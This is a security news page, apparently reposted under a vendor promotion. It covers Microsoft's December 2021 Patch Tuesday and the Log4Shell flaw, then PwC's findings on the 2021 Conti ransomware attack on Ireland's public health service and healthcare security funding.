Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

Read Now

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

Microsoft Patch Tuesday, December 2021 Edition

/0 Comments/in /by

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at Lunasec, many, many services are vulnerable to this exploit.

“Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” Lunasec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled here.”

“If you run a server built on open-source software, there’s a good chance you are impacted by this vulnerability,” said Dustin Childs of Trend Micro’s Zero Day Initiative. “Check with all the vendors in your enterprise to see if they are impacted and what patches are available.”

Part of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said Johannes Ullrich, an incident handler and blogger for the SANS Internet Storm Center. “Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon,” Ullrich said. “Treat it as such.” SANS has a good walk-through of how simple yet powerful the exploit can be.

John Hultquist, vice president of intelligence analysis at Mandiant, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.

“We anticipate other state actors are doing so as well, or preparing to,” Hultquist said. “We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”

Researcher Kevin Beaumont had a more lighthearted take on Log4Shell via Twitter:

“Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly.”

A half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire “critical” rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.

The Windows flaw already seeing active exploitation is CVE-2021-43890, which is a “spoofing” bug in the Windows AppX installer on Windows 10. Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like Emotet, Trickbot, and BazaLoader.

Kevin Breen, director of threat research for Immersive Labs, said CVE-2021-43905 stands out of this month’s patch batch.

“Not only for its high CVSS score of 9.6, but also because it’s noted as ‘exploitation more likely’,” Breen observed.

Microsoft also patched CVE-2021-43883, an elevation of privilege vulnerability in Windows Installer.

“This appears to be a fix for a patch bypass of CVE-2021-41379, another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November,” Satnam Narang of Tenable points out. “However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.”

Google issued five security fixes for Chrome, including one rated critical and three others with high severity. If you’re browsing with Chrome, keep a lookout for when you see an “Update” tab appear to the right of the address bar. If it’s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.

Also, Adobe issued patches to correct more than 60 security flaws in a slew of products, including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

SANS ISC listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

Inside Ireland’s Public Healthcare Ransomware Scare

/0 Comments/in /by

The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system. The unusually candid post-mortem found that nearly two months elapsed between the initial intrusion and the launching of the ransomware. It also found affected hospitals had tens of thousands of outdated Windows 7 systems, and that the health system’s IT administrators failed to respond to multiple warning signs that a massive attack was imminent.

PWC’s timeline of the days leading up to the deployment of Conti ransomware on May 14.

Ireland’s Health Service Executive (HSE), which operates the country’s public health system, got hit with Conti ransomware on May 14, 2021. A timeline in the report (above) says the initial infection of the “patient zero” workstation happened on Mar. 18, 2021, when an employee on a Windows computer opened a booby-trapped Microsoft Excel document in a phishing email that had been sent two days earlier.

Less than a week later, the attacker had established a reliable backdoor connection to the employee’s infected workstation. After infecting the system, “the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14, 2021,” the report states.

According to PWC’s report (PDF), there were multiple warning signs about a serious network intrusion, but those red flags were either misidentified or not acted on quickly enough:

  • On Mar. 31, 2021, the HSE’s antivirus software detected the execution of two software tools commonly used by ransomware groups — Cobalt Strike and Mimikatz — on the Patient Zero Workstation. But the antivirus software was set to monitor mode, so it did not block the malicious commands.”
  • On May 7, the attacker compromised the HSE’s servers for the first time, and over the next five days the intruder would compromise six HSE hospitals. On May 10, one of the hospitals detected malicious activity on its Microsoft Windows Domain Controller, a critical “keys to the kingdom” component of any Windows enterprise network that manages user authentication and network access.
  • On 10 May 2021, security auditors first identified evidence of the attacker compromising systems within Hospital C and Hospital L. Hospital C’s antivirus software detected Cobalt Strike on two systems but failed to quarantine the malicious files.
  • On May 13, the HSE’s antivirus security provider emailed the HSE’s security operations team, highlighting unhandled threat events dating back to May 7 on at least 16 systems. The HSE Security Operations team requested that the Server team restart servers.

By then it was too late. At just after midnight Ireland time on May 14, the attacker executed the Conti ransomware within the HSE. The attack disrupted services at several Irish hospitals and resulted in the near complete shutdown of the HSE’s national and local networks, forcing the cancellation of many outpatient clinics and healthcare services. The number of appointments in some areas dropped by up to 80 percent.”

Conti initially demanded USD $20 million worth of virtual currency in exchange for a digital key to unlock HSE servers compromised by the group. But perhaps in response to the public outcry over the HSE disruption, Conti reversed course and gave the HSE the decryption keys without requiring payment.

Still, the work to restore infected systems would take months. The HSE ultimately enlisted members of the Irish military to bring in laptops and PCs to help restore computer systems by hand. It wasn’t until September 21, 2021 that the HSE declared 100 percent of its servers were decrypted.

As bad as the HSE ransomware attack was, the PWC report emphasizes that it could have been far worse. For example, it is unclear how much data would have been unrecoverable if a decryption key had not become available as the HSE’s backup infrastructure was only periodically backed up to offline tape.

The attack also could have been worse, the report found:

  • if there had been intent by the Attacker to target specific devices within the HSE environment (e.g. medical devices);
  • if the ransomware took actions to destroy data at scale;
  • if the ransomware had auto-propagation and persistence capabilities, for example by using an exploit to propagate across domains and trust-boundaries to medical devices (e.g. the EternalBlue exploit used by the WannaCry and NotPetya15 attacks);
  • if cloud systems had also been encrypted such as the COVID-19 vaccination system

The PWC report contains numerous recommendations, most of which center around hiring new personnel to lead the organization’s redoubled security efforts. But it is clear that the HSE has an enormous amount of work ahead to grow in security maturity. For example, the report notes the HSE’s hospital network had over 30,000 Windows 7 workstations that were deemed end of life by the vendor.

“The HSE assessed its cybersecurity maturity rating as low,” PWC wrote. “For example, they do not have a CISO or a Security Operations Center established.”

PWC also estimates that efforts to build up the HSE’s cybersecurity program to the point where it can rapidly detect and respond to intrusions are likely to cost “a multiple of the HSE’s current capital and operation expenditure in these areas over several years.”

One idea of a “security maturity” model.

In June 2021, the HSE’s director general said the recovery costs for the May ransomware attack were likely to exceed USD $600 million.

What’s remarkable about this incident is that the HSE is publicly funded by the Irish government, and so in theory it has the money to spend (or raise) to pay for all these ambitious recommendations for increasing their security maturity.

That stands in stark contrast to the healthcare system here in the United States, where the single biggest impediment to doing security well continues to be lack of making it a real budget priority. Also, most healthcare organizations in the United States are private companies that operate on razor-thin profit margins.

I know this because in 2018 I was asked to give the keynote at an annual gathering of the Healthcare Information Sharing and Analysis Group (H-ISAC), an industry group centered on sharing information about cybersecurity threats. I almost didn’t accept the invitation: I’d written very little about healthcare security, which seemed to be dominated by coverage of whether healthcare organizations complied with the letter of the law in the United States. That compliance centered on the Health Insurance Portability and Accountability Act (HIPPA), which prioritizes protecting the integrity and privacy of patient data.

To get up to speed, I interviewed over a dozen of the healthcare security industry’s best and brightest minds. A common refrain I heard from those interviewed was that if it was security-related but didn’t have to do with compliance, there probably wasn’t much chance it would get any budget.

Those sources unanimously said that however well-intentioned, it’s not clear that the “protect the data” regulatory approach of HIPPA was working from an overall threat perspective. According to HealthcareIT News, more than 40 million patient records have been compromised in incidents reported to the federal government in 2021 so far alone.

During my 2018 talk, I tried to emphasize the primary importance of being able to respond quickly to intrusions. Here’s a snippet of what I told that H-ISAC audience:

“The term ‘Security Maturity’ refers to the street smarts of an individual or organization, and this maturity generally comes from making plenty of mistakes, getting hacked a lot, and hopefully learning from each incident, measuring response times, and improving.

Let me say up front that all organizations get hacked. Even ones that are doing everything right from a security perspective get hacked probably every day if they’re big enough. By hacked I mean someone within the organization falls for a phishing scam, or clicks a malicious link and downloads malware. Because let’s face it, it only takes one screw up for the hackers to get a foothold in the network.

Now this is in itself isn’t bad. Unless you don’t have the capability to detect it and respond quickly. And if you can’t do that, you run the serious risk of having a small incident metastasize into a much larger problem.

Think of it like the medical concept of the ‘Golden Hour:’ That short window of time directly following a traumatic injury like a stroke or heart attack in which life-saving medicine and attention is likely to be most effective. The same concept holds true in cybersecurity, and it’s exactly why so many organizations these days are placing more of their resources into incident response, instead of just prevention.”

The United States’ somewhat decentralized healthcare system means that many ransomware outbreaks tend to be limited to regional or local healthcare facilities. But a well-placed ransomware attack or series of attacks could inflict serious damage on the sector: A December 2020 report from Deloitte says the top 10 health systems now control 24 market share and their revenue grew at twice the rate of the rest of the market.

In October 2020, KrebsOnSecurity broke the story that the FBI and U.S. Department of Homeland Security had obtained chatter from a top ransomware group which warned of an “imminent cybercrime threat to U.S. hospitals and healthcare providers.” Members associated with the Russian-speaking ransomware group known as Ryuk had discussed plans to deploy ransomware at more than 400 healthcare facilities in the United States.

Hours after that piece ran, I heard from a respected H-ISAC security professional who questioned whether it was worth getting the public so riled up. The story had been updated multiple times throughout the day, and there were at least five healthcare organizations hit with ransomware within the span of 24 hours.

“I guess it would help if I understood what the baseline is, like how many healthcare organizations get hit with ransomware on average in one week?” I asked the source.

“It’s more like one a day,” the source confided.

In all likelihood, the HSE will get the money it needs to implement the programs recommended by PWC, however long that takes. I wonder how many U.S.-based healthcare organizations could say the same.